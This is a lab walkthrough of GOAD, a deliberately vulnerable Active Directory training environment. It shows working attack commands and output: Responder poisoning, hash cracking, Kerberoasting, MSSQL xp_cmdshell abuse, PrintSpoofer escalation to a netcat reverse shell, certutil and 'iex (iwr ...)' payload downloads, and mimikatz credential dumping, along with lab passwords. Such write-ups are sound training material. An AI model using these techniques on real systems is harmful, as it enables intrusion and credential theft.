GOAD-WRITEUP

What is GOAD?

GOAD is an AD environment and its construction tools for the purpose of pentesting exercises.

The repository itself offers a variety of environments, but this time we will cover the most basic environment: 5 VMs, 2 forests, and 3 domains.

Furthermore, since five Windows machines will be running, certain machine specifications are required.

I also prepared a Kali Linux VM for the walkthrough.

Here is my machine.

Ubuntu 22.04.5 LTS, 
12-core CPU 
, 32GB RAM

It worked fine in my environment, so I think it will work without any problems if your machine has sufficient specs.

.

GOAD Credentials

Below is a table that summarizes all GOAD credentials to be used as reference:

.

Building GOAD

We will build the GOAD environment.

However, there is nothing particularly difficult about it; all you need to do is clone the repository and run the command below.

./goad.sh -t install -l GOAD -p virtualbox -m docker 
./goad.sh -t start -l GOAD -p virtualbox -m docker

To stop it, run the following command:

./goad.sh -t stop -l GOAD -p virtualbox -m docker

The setup will take some time, so have a cup of tea while you wait. It depends on your machine’s specs, but I personally found it took about 15 minutes for the initial setup, and about 5 minutes to start up the setup environment.

GOAD Walkthrough

Now let’s get started on conquering the GOAD machine.

This time, we aim to obtain Administrator privileges on all five machines.

The machines 192.168.56.0/24will be deployed across all networks, so we will proceed with the strategy based on this assumption.

Recon

I would like to explore the network using nmap or RustScan, but since we know that there are five Windows machines deployed this time, let’s explore using the netexec command

bolke@hacky:~$ nxc smb 192.168.56.0/24
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)

.

┌──(bolke㉿kali)-[~/htb]
└─$ nxc smb 192.168.56.10 --generate-hosts-file hosts
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)

┌──(bolke㉿kali)-[~/htb]
└─$ cat hosts
192.168.56.10     KINGSLANDING.sevenkingdoms.local sevenkingdoms.local KINGSLANDING
192.168.56.11     WINTERFELL.north.sevenkingdoms.local north.sevenkingdoms.local WINTERFELL
192.168.56.12     MEEREEN.essos.local essos.local MEEREEN
192.168.56.22     CASTELBLACK.north.sevenkingdoms.local CASTELBLACK
192.168.56.23     BRAAVOS.essos.local BRAAVOS

.

I was able to obtain a variety of information, which can be summarized as follows:

Five machines, three domains.

• Domain: essos.local
  • meereen.essos.local (Windows Server 2016 Standard Evaluation 14393 x64)
  • braavos.essos.local (Windows Server 2016 Standard Evaluation 14393 x64)(signing:False)
• Domain: north.sevenkingdoms.local
  • castelblack.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)(signing:False)
  • winterfell.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
• Domain: sevenkingdoms.local
  • kingslanding.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)

Find the server that is acting as the DC.

The commands are as follows:

nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10

Do this for each domain.

bolke@hacky:~$ nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Server:		192.168.56.10
Address:	192.168.56.10#53

_ldap._tcp.dc._msdcs.sevenkingdoms.local	service = 0 100 389 kingslanding.sevenkingdoms.local.

.

bolke@hacky:~$ nslookup -type=srv _ldap._tcp.dc._msdcs.north.sevenkingdoms.local 192.168.56.10
Server:		192.168.56.10
Address:	192.168.56.10#53

Non-authoritative answer:
_ldap._tcp.dc._msdcs.north.sevenkingdoms.local	service = 0 100 389 winterfell.north.sevenkingdoms.local.

Authoritative answers can be found from:
winterfell.north.sevenkingdoms.local	internet address = 192.168.56.11

.

bolke@hacky:~$ nslookup -type=srv _ldap._tcp.dc._msdcs.essos.local 192.168.56.10
Server:		192.168.56.10
Address:	192.168.56.10#53

Non-authoritative answer:
_ldap._tcp.dc._msdcs.essos.local	service = 0 100 389 meereen.essos.local.

Authoritative answers can be found from:
meereen.essos.local	internet address = 192.168.56.12

. 

Now that we have the IP addresses of the DCs that correspond to various domains, /etc/hostslet’s update them.

┌──(kali㉿kali)-[~] 
└─$ cat /etc/hosts 
127.0.0.1 localhost 
127.0.1.1 kali 
# GOAD 
192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding 
192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell 
192.168.56.12 essos.local meereen.essos.local meereen 
192.168.56.22 castelblack.north.sevenkingdoms.local castelblack 
192.168.56.23 braavos.essos.local braavos 
::1 localhostavos ip6-localhost ip6-loopback 
ff02::1 ip6-allnodes 
ff02::2 ip6-allrouters

Responder

Now, let’s see if we can capture any authentication information using Responder.

┌──(kali㉿kali)-[~] 
└─$ sudo responder -I eth1 
                                         __ 
  .----.----.------.-----.------.-----.--| |.----.----. 
  | _| -__|__ --| _ | _ | | _ || -__| _| 
  |__| |_____|_____| __|_____|__|__|_____||_____|__| | 
                   __| 

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0 

  To support this project: 
  Github -> https://github.com/sponsors/lgandx 
  Paypal -> https://paypal.me/PythonResponder 

  Author: Laurent Gaffie (laurent.gaffie@gmail.com) 
  To kill this script hit CTRL-C 


[+] Poisoners: 
    LLMNR [ON] 
    NBT-NS [ON] 
    MDNS [ON] 
    DNS [ON] 
    DHCP [OFF] 

[+] Servers: 
    HTTP server [ON] 
    HTTPS server [ON] 
    WPAD proxy [OFF] 
    Auth proxy [OFF] 
    SMB server [ON] 
    Kerberos server [ON] 
    SQL server [ON] 
    FTP server [ON] 
    IMAP server [ON] 
    POP3 server [ON] 
    SMTP server [ON] 
    DNS server [ON] 
    LDAP server [ON] 
    MQTT server [ON] 
    RDP server [ON] 
    DCE-RPC server [ON] 
    WinRM server [ON] 
    SNMP server [OFF] 

[+] HTTP Options: 
    Always serving EXE [OFF] 
    Serving EXE [OFF] 
    Serving HTML [OFF] 
    Upstream Proxy [OFF] 

[+] Poisoning Options: 
    Analyze Mode [OFF] 
    Force WPAD auth [OFF] 
    Force Basic Auth [OFF] 
    Force LM downgrade [OFF] 
    Force ESS downgrade [OFF] 

[+] Generic Options: 
    Responder NIC [eth1] 
    Responder IP [192.168.56.104] 
    Responder IPv6 [fe80::5af0:79:dd52:80d1] 
    Challenge set [random] 
    Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL'] 

[+] Current Session Variables: 
    Responder Machine Name [WIN-YPREFKD6ZBU] 
    Responder Domain Name [NMYV.LOCAL] 
    Responder DCE-RPC Port [48610]

[+] Listening for events...                                                                                                                                                                                                                                                                                                 

[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name BRAVOS (service: File Server) 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[SMB] NTLMv2-SSP Client : fe80::65bb:b7ff:1ad1:140 
[SMB] NTLMv2-SSP Username : NORTH\robb.stark 
[SMB] NTLMv2-SSP Hash : robb.stark::NORTH:d186ef4b2d5f70e9:0E29C7FA08D6D94EA56390D123A5A422:                                                                                                                                                                                                                                                  
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned sent answer to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] Skipping previously captured hash for NORTH\robb.stark
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] Skipping previously captured hash for NORTH\robb.stark 
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name MEREN (service: File Server) 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[SMB] NTLMv2-SSP Client : fe80::65bb:b7ff:1ad1:140 
[SMB] NTLMv2-SSP Username : NORTH\eddard.stark 
[SMB] NTLMv2-SSP Hash : eddard.stark::NORTH:7acc26627de9f50b:8B925C1E0C815B42E9D34D1830847365:                                                                                                                                                                                                                                                    
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] Skipping previously captured hash for NORTH\eddard.stark 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] Skipping previously captured hash for NORTH\eddard.stark 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] Skipping previously captured hash for NORTH\robb.stark 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] Skipping previously captured hash for NORTH\robb.stark 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] Skipping previously captured hash for NORTH\robb.stark 
[+] Exiting...

I was able to immediately obtain two NTLM hashes.

robb.starkLet’s crack the hash of

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt                 
Using default input encoding: UTF-8 
Loaded 9 password hashes with 9 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) 
Will run 4 OpenMP threads 
Press 'q' or Ctrl-C to abort, almost any other key for status 
sexywolfy (robb.stark)    
6g 0:00:00:14 DONE (2024-10-06 15:40) 0.4276g/s 1022Kp/s 3622Kc/s 3622KC/s !)(OPPQR..*7¡Vamos! 
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably 
Session completed.

robb.stark/sexywolfyI was able to obtain the credentials.

Let’s use NetExec to see how far these credentials can be used.

First, SMB

bolke@hacky:~$ nxc smb 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy'
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.12   445    MEEREEN          [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE 
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE 
SMB         192.168.56.23   445    BRAAVOS          [+] essos.local\robb.stark:sexywolfy (Guest)
SMB         192.168.56.22   445    CASTELBLACK      [+] north.sevenkingdoms.local\robb.stark:sexywolfy 
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Next is winrm.

bolke@hacky:~$ nxc winrm 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy'
WINRM       192.168.56.10   5985   KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) 
WINRM       192.168.56.12   5985   MEEREEN          [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local) 
WINRM       192.168.56.11   5985   WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) 
WINRM       192.168.56.22   5985   CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) 
WINRM       192.168.56.23   5985   BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) 
WINRM       192.168.56.10   5985   KINGSLANDING     [-] sevenkingdoms.local\robb.stark:sexywolfy
WINRM       192.168.56.12   5985   MEEREEN          [-] essos.local\robb.stark:sexywolfy
WINRM       192.168.56.11   5985   WINTERFELL       [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
WINRM       192.168.56.22   5985   CASTELBLACK      [-] north.sevenkingdoms.local\robb.stark:sexywolfy
WINRM       192.168.56.23   5985   BRAAVOS          [-] essos.local\robb.stark:sexywolfy
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

.

Winterfell Walkthrough (User Permissions)

Looks like you can use your credentials in WINTERFELL.

Let’s try entering it with evil-winrm.py 

git clone https://github.com/adityatelange/evil-winrm-py.git

bolke@hacky:~$ git clone https://github.com/adityatelange/evil-winrm-py.git
bolke@hacky:~/evil-winrm-py$ pipx install evil_winrm_py
  installed package evil-winrm-py 1.6.0, installed using Python 3.10.12
  These apps are now globally available
    - evil-winrm-py
    - ewp
done! ✨ 🌟 ✨

.

bolke@hacky:~/htb$ ewp -u robb.stark -p sexywolfy -i winterfell.north.sevenkingdoms.local
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.6.0

[*] Connecting to 'winterfell.north.sevenkingdoms.local:5985' as 'robb.stark'
evil-winrm-py PS C:\Users\robb.stark\Documents>

I was able to get in safely.

Let’s try listing the users.

C:\Users\jon.snow>net user /domain
The request will be processed at a domain controller for domain north.sevenkingdoms.local.

User accounts for \\winterfell.north.sevenkingdoms.local

-------------------------------------------------------------------------------
Administrator            arya.stark               brandon.stark
catelyn.stark            eddard.stark             Guest
hodor                    jeor.mormont             jon.snow
krbtgt                   rickon.stark             robb.stark
samwell.tarly            sansa.stark              sql_svc
vagrant
The command completed successfully.

The results are compiled in users.txt.

Kerberoasting

• On an active directory, we will see very often users with an SPN set.
• let’s find them with impacket

bolke@hacky:~/htb$ GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
Impacket v0.14.0.dev0+20260326.150834.76ee8774 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName                                 Name         MemberOf                                                    PasswordLastSet             LastLogon                   Delegation  
---------------------------------------------------  -----------  ----------------------------------------------------------  --------------------------  --------------------------  -----------
HTTP/eyrie.north.sevenkingdoms.local                 sansa.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local        2026-03-27 17:38:14.742463  <never>                                 
CIFS/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-03-27 17:38:27.015374  2026-04-06 09:36:01.306388  constrained 
HTTP/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-03-27 17:38:27.015374  2026-04-06 09:36:01.306388  constrained 
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                                  2026-03-27 17:38:35.812323  2026-04-01 09:46:30.394085              
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                                  2026-03-27 17:38:35.812323  2026-04-01 09:46:30.394085              

All the hashes will be stored in the file named kerberoasting.hashes

• we could also do that with nxc with the following command :

nxc ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

• Now let’s try to crack the hashes :

hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force

• And we found another user : jon.snow/iknownothing

.

CASTELBLACK Exploit (Securing Administrator Privileges from MSSQL)

jon.snow has access to MSSQL in CASTELBLACK.

bolke@hacky:~/htb$ nxc mssql 192.168.56.10-12 192.168.56.22-23 -u jon.snow -p 'iknownothing'
MSSQL       192.168.56.23   1433   BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) (EncryptionReq:False)
MSSQL       192.168.56.22   1433   CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (EncryptionReq:False)
MSSQL       192.168.56.23   1433   BRAAVOS          [-] essos.local\jon.snow:iknownothing (Login failed for user 'BRAAVOS\Guest'. Please try again with or without '--local-auth')
MSSQL       192.168.56.22   1433   CASTELBLACK      [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!)
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Let’s access MSSQL.

bolke@hacky:~/htb$ mssqlclient.py north.sevenkingdoms.local/jon.snow:iknownothing@castelblack -windows-auth
Impacket v0.14.0.dev0+20260326.150834.76ee8774 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (NORTH\jon.snow  dbo@master)> 

Let’s find out who the system administrator is for this server.

SQL (NORTH\jon.snow  dbo@master)> select loginname from syslogins where sysadmin = '1'
loginname                     
---------------------------   
sa                            
NORTH\sql_svc                 
NT SERVICE\SQLWriter          
NT SERVICE\Winmgmt            
NT SERVICE\MSSQL$SQLEXPRESS   
CASTELBLACK\vagrant           
NORTH\jon.snow                
SQL (NORTH\jon.snow  dbo@master)>

.

You can see that the user jon.snow is listed as a sysadmin.

Enable xp_cmdshell and create a reverse shell (you can create a reverse shell at the following site: https://www.revshells.com

First, listen with netcat:

rlwrap nc -lvnp 4444

Next, create a reverse shell in MSSQL.

When listening, you can get a reverse shell like this:

Let’s look at the permissions of north\sql_svc we have.SeImpersonatePrivilegeSince it is valid, I will try to use PrintSpoofer. https://github.com/itm4n/PrintSpoofer

For now, we will transport PrintSpoofer.

bolke@hacky:~/htb$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.56.22 - - [06/Apr/2026 12:15:19] "GET /PrintSpoofer64.exe HTTP/1.1" 200 -
192.168.56.22 - - [06/Apr/2026 12:15:19] "GET /PrintSpoofer64.exe HTTP/1.1" 200 -
192.168.56.22 - - [06/Apr/2026 12:16:00] "GET /nc64.exe HTTP/1.1" 200 -
192.168.56.22 - - [06/Apr/2026 12:16:00] "GET /nc64.exe HTTP/1.1" 200 -

.

bolke@hacky:~/htb$ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.56.22 50012

PS C:\Windows\system32> whoami
north\sql_svc
PS C:\Windows\system32> hostname
castelblack
PS C:\Windows\system32> cd /tmp
PS C:\tmp> ls

    Directory: C:\tmp

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        3/27/2026   9:39 AM         660143 GOAD.png                                                              
-a----        3/27/2026   8:39 AM          15766 vagrant-shell.ps1                                                     


PS C:\tmp> certutil -urlcache -split -f http://192.168.56.1:8888/PrintSpoofer64.exe
****  Online  ****
  0000  ...
  6a00
CertUtil: -URLCache command completed successfully.
PS C:\tmp> certutil -urlcache -split -f http://192.168.56.1:8888/nc64.exe
****  Online  ****
  0000  ...
  b0d8
CertUtil: -URLCache command completed successfully.
PS C:\tmp> 

On the CASTELBLACK side, move to /tmp as shown . This is where you will import various tools.

On the Kali side, open the port using Netcat.

lwrap nc -lvnp 80   
listening on [any] 80 ...

Run PrintSpoofer with PowerShell

PS C:\tmp> .\PrintSpoofer64.exe -i -c ".\nc64.exe 192.168.56.1 80 -e powershell"

A reverse shell has been established. You can confirm with whoami that you have system administrator privileges.

bolke@hacky:~/htb$ sudo nc -nlvp 80
Listening on 0.0.0.0 80
Connection received on 192.168.56.22 50031
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
castelblack
PS C:\Windows\system32> 

Next, deliver mimikatz.

First, make mimikatz available for download via HTTP on the attacker’s machine.

$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe . 
                                                                                                                                                            
┌──(kali㉿kali)-[~/goad/castelblack] 
└─$ python2 -m SimpleHTTPServer 8080                            
Serving HTTP on 0.0.0.0 port 8080 ..

Download mimikatz using the target’s shell.

PS C:\Windows\system32> certutil -urlcache -split -f http://192.168.56.1:8888/mimikatz.exe 
certutil -urlcache -split -f http://192.168.56.1:8888/mimikatz.exe 
**** Online **** 
  000000 ... 
  14ae00 
CertUtil: -URLCache command completed successfully.

Dumps authentication information.

Now that we have successfully obtained the authentication information, let’s try logging in using Pass-the-hash.

I was able to obtain Administrator privileges for CASTELBLACK.

Mimikatz could als be done with

PS C:\windows\system32>  iex (iwr http://192.168.56.1:8888/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'

iex (iwr http://10.254.110.123/ad/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'
Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'
Invoke-Mimi -Command '"token::elevate" "lsadump::sam"'
Invoke-Mimi -Command '"token::elevate" "sekurlsa::logonpasswords"'

Winterfell walkthrough (administrator privileges)

Find users at north.sevenkingdoms.local/.

I got brandon.stark’s krb5asrep so I’ll try cracking it with john.

brandon.stark/iseedadpeopleI got the authentication information.

we could also use hashcat -m 18200 asrephash /usr/share/wordlists/rockyou.txt --show

Now that we have obtained the authentication information of a user belonging to the north.sevenkingdoms.local domain, let’s try to use it to perform bloodhound.

Try adding a name server to resolve.conf (the ns flag should probably work too).

┌──(kali㉿kali)
└─$ cat /etc/resolv.conf 
# Generated by NetworkManager 
nameserver 10.0.2.3 
nameserver 192.168.56.10

Run bloodhound-python.

┌──(bolke㉿kali)-[~/htb]
└─$ bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: north.sevenkingdoms.local
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 3 computers
INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 18 users
INFO: Found 51 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: castelblack.north.sevenkingdoms.local
INFO: Querying computer: winterfell.north.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20260406135710_bloodhound.zip

We were able to obtain the information. We will continue to obtain information on other domains in this manner.

┌──(bolke㉿kali)-[~/htb]
└─$ bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local
